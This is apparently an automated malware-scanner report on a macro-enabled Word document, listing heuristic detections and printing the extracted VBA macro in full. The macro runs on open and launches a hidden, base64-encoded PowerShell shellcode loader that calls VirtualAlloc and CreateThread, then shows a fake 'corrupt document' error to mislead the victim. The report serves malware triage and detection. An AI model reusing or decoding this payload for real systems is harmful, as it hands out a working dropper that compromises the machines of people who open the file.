MALICIOUS
350
Risk Score
Heuristics 8
-
ClamAV: Doc.Macro.Powershell-6203137-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Powershell-6203137-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell ("POWERSHELL.EXE " & x) -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
x = "powershell -window hidden -enc JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5A" _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7750 bytes |
SHA-256: bdd58c65bd558cb12d18437d71922f7804c4528bd94ebb40ab88eeee5eced011 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains a PowerShell -EncodedCommand style payload. Carved artifact contains 18 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim x
x = "powershell -window hidden -enc JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5A" _
& "HAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAU" _
& "wB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkA" _
& "GUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAGMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAM" _
& "AB4AGQAYgAsADAAeABiADgALAAwAHgANQBlACwAMAB4ADYAZQAsADAAeAAyADYALAAwAHgAMwA5ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGIALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADgAMwAsADAAeABlAGIALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA0ADMALAAwAHgAMQA0ACwAMAB4ADAAMwAsADAAeAA0ADMALAAwAHgANABhACwAMAB4ADgAYwAsADAAeABkADMALAAwAHgAYwA1ACwAMAB4ADkAYQAsADAAeABkA" _
& "DIALAAwAHgAMQBjACwAMAB4ADMANgAsADAAeAA1AGEALAAwAHgAYgAzACwAMAB4ADkANQAsADAAeABkADMALAAwAHgANgBiACwAMAB4AGYAMwAsADAAeABjADIALAAwAHgAOQAwACwAMAB4AGQAYgAsADAAeABjADMALAAwAHgAOAAxACwAMAB4AGYANQAsADAAeABkADcALAAwAHgAYQA4ACwAMAB4AGMANAAsADAAeABlAGQALAAwAHgANgBjACwAMAB4AGQAYwAsADAAeABjADAALAAwAHgAMAAyACwAMAB4AGMANQAsADAAeAA2AGIALAAwAHgAMwA3ACwAMAB4ADIAYwAsADAAeABkADYALAAwAHgAYwAwACwAM" _
& "AB4ADAAYgAsADAAeAAyAGYALAAwAHgANQA0ACwAMAB4ADEAYgAsADAAeAA1ADgALAAwAHgAOABmACwAMAB4ADYANQAsADAAeABkADQALAAwAHgAYQBkACwAMAB4AGMAZQAsADAAeABhADIALAAwAHgAMAA5ACwAMAB4ADUAZgAsADAAeAA4ADIALAAwAHgANwBiACwAMAB4ADQANQAsADAAeABmADIALAAwAHgAMwAzACwAMAB4ADAAOAAsADAAeAAxADMALAAwAHgAYwBmACwAMAB4AGIAOAAsADAAeAA0ADIALAAwAHgAYgA1ACwAMAB4ADUANwAsADAAeAA1AGMALAAwAHgAMQAyACwAMAB4AGIANAAsADAAeAA3A" _
& "DYALAAwAHgAZgAzACwAMAB4ADIAOQAsADAAeABlAGYALAAwAHgANQA4ACwAMAB4AGYANQAsADAAeABmAGUALAAwAHgAOQBiACwAMAB4AGQAMAAsADAAeABlAGQALAAwAHgAZQAzACwAMAB4AGEANgAsADAAeABhAGIALAAwAHgAOAA2ACwAMAB4AGQANwAsADAAeAA1AGQALAAwAHgAMgBhACwAMAB4ADQAZgAsADAAeAAyADYALAAwAHgAOQBkACwAMAB4ADgAMQAsADAAeABhAGUALAAwAHgAOAA3ACwAMAB4ADYAYwAsADAAeABkAGIALAAwAHgAZgA3ACwAMAB4ADIAZgAsADAAeAA4AGYALAAwAHgAYQBlACwAM" _
& "AB4ADAAMQAsADAAeAA0AGMALAAwAHgAMwAyACwAMAB4AGEAOQAsADAAeABkADUALAAwAHgAMgBmACwAMAB4AGUAOAAsADAAeAAzAGMALAAwAHgAYwBlACwAMAB4ADkANwAsADAAeAA3AGIALAAwAHgAZQA2ACwAMAB4ADIAYQAsADAAeAAyADYALAAwAHgAYQBmACwAMAB4ADcAMQAsADAAeABiADgALAAwAHgAMgA0ACwAMAB4ADAANAAsADAAeABmADUALAAwAHgAZQA2ACwAMAB4ADIAOAAsADAAeAA5AGIALAAwAHgAZABhACwAMAB4ADkAYwAsADAAeAA1ADQALAAwAHgAMQAwACwAMAB4AGQAZAAsADAAeAA3A" _
& "DIALAAwAHgAZABkACwAMAB4ADYAMgAsADAAeABmAGEALAAwAHgANQA2ACwAMAB4ADgANgAsADAAeAAzADEALAAwAHgANgAzACwAMAB4AGMAZQAsADAAeAA2ADIALAAwAHgAOQA3ACwAMAB4ADkAYwAsADAAeAAxADAALAAwAHgAYwBkACwAMAB4ADQAOAAsADAAeAAzADkALAAwAHgANQBhACwAMAB4AGUAMwAsADAAeAA5AGQALAAwAHgAMwAwACwAMAB4ADAAMQAsADAAeAA2AGIALAAwAHgANQAxACwAMAB4ADcAOQAsADAAeABiAGEALAAwAHgANgBiACwAMAB4AGYAZAAsADAAeAAwAGEALAAwAHgAYwA5ACwAM" _
& "AB4ADUAOQAsADAAeABhADIALAAwAHgAYQAwACwAMAB4ADQANQAsADAAeABkADEALAAwAHgAMgBiACwAMAB4ADYAZgAsADAAeAA5ADEALAAwAHgAMQA2ACwAMAB4ADAANgAsADAAeABkADcALAAwAHgAMABkACwAMAB4AGUAOQAsADAAeABhADkALAAwAHgAMgA4ACwAMAB4ADAANwAsADAAeAAyAGQALAAwAHgAZgBkACwAMAB4ADcAOAAsADAAeAAzAGYALAAwAHgAOAA0ACwAMAB4ADcAZQAsADAAeAAxADMALAAwAHgAYgBmACwAMAB4ADIAOQAsADAAeABhAGIALAAwAHgAYgA0ACwAMAB4AGUAZgAsADAAeAA4A" _
& "DUALAAwAHgAMAA0ACwAMAB4ADcANQAsADAAeAA0ADAALAAwAHgANgA1ACwAMAB4AGYANQAsADAAeAAxAGQALAAwAHgAOABhACwAMAB4ADYAYQAsADAAeAAyAGEALAAwAHgAMwBkACwAMAB4AGIANQAsADAAeABhADEALAAwAHgANAAzACwAMAB4AGQANAAsADAAeAA0AGYALAAwAHgAMgAxACwAMAB4AGQAZAAsADAAeABkADAALAAwAHgAMwA0ACwAMAB4ADEANAAsADAAeAA3ADUALAAwAHgAMgAxACwAMAB4AGIANQAsADAAeAA0ADMALAAwAHgAMgA5ACwAMAB4AGEAYwAsADAAeAA1ADMALAAwAHgAMAAxACwAM" _
& "AB4ADIANQAsADAAeABmADkALAAwAHgAYwBjACwAMAB4AGIAZAAsADAAeABkAGMALAAwAHgAYQAwACwAMAB4ADgANwAsADAAeAA1AGMALAAwAHgAMgAwACwAMAB4ADcAZgAsADAAeABlADIALAAwAHgANQBlACwAMAB4AGEAYQAsADAAeAA4AGMALAAwAHgAMQAyACwAMAB4ADEAMAAsADAAeAA1AGIALAAwAHgAZgA4ACwAMAB4ADAAMAAsADAAeABjADQALAAwAHgAYQBiACwAMAB4AGIANwAsADAAeAA3AGIALAAwAHgANAAyACwAMAB4AGIAMwAsADAAeAA2AGQALAAwAHgAMQAxACwAMAB4ADYAYQAsADAAeAAyA" _
& "DEALAAwAHgAOABhACwAMAB4AGIAMAAsADAAeAAzAGQALAAwAHgAZABkACwAMAB4ADkAMAAsADAAeABlADUALAAwAHgAMAA5ACwAMAB4ADQAMgAsADAAeAA2AGEALAAwAHgAYwAwACwAMAB4ADAAMgAsADAAeAA0AGIALAAwAHgAZgBlACwAMAB4AGEAYgAsADAAeAA3AGMALAAwAHgAYgA0ACwAMAB4AGUAZQAsADAAeAAyAGIALAAwAHgANwBjACwAMAB4AGUAMgAsADAAeAA2ADQALAAwAHgAMgBjACwAMAB4ADEANAAsADAAeAA1ADIALAAwAHgAZABkACwAMAB4ADcAZgAsADAAeAAwADEALAAwAHgAOQBkACwAM" _
& "AB4AGMAOAAsADAAeAAxADMALAAwAHgAOQBhACwAMAB4ADAAOAAsADAAeABmADMALAAwAHgANAA1ACwAMAB4ADQAZgAsADAAeAA5AGEALAAwAHgAOQBiACwAMAB4ADYAYgAsADAAeABiADYALAAwAHgAZQBjACwAMAB4ADAAMwAsADAAeAA5ADMALAAwAHgAOQBkACwAMAB4AGUAYwAsADAAeAA3ADgALAAwAHgANAAyACwAMAB4AGQAYgAsADAAeAA5AGEALAAwAHgAOQAwACwAMAB4ADUANgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxA" _
& "DAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAeAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAeAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAI" _
& "AAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAeAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkA" _
& "DEAKQApADsAJAAyACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAMwAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAAzACAAJAAyACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAb" _
& "wB3AGUAcgBzAGgAZQBsAGwAIAAkADIAIAAkAGUAIgA7AH0A"
Shell ("POWERSHELL.EXE " & x)
Dim title As String
title = "Critical Microsoft Office Error"
Dim msg As String
Dim intResponse As Integer
msg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."
intResponse = MsgBox(msg, 16, title)
Application.Quit
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 18432 bytes |
SHA-256: 201a2e45c92cb6b9d7ba8a77d829c48ee2edcca68edc51e12937ef7a0c415f4e |
|||
|
Detection
ClamAV:
Doc.Macro.Powershell-6203137-0
Obfuscation or payload:
likely
Carved artifact contains a PowerShell -EncodedCommand style payload. Carved artifact contains 18 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.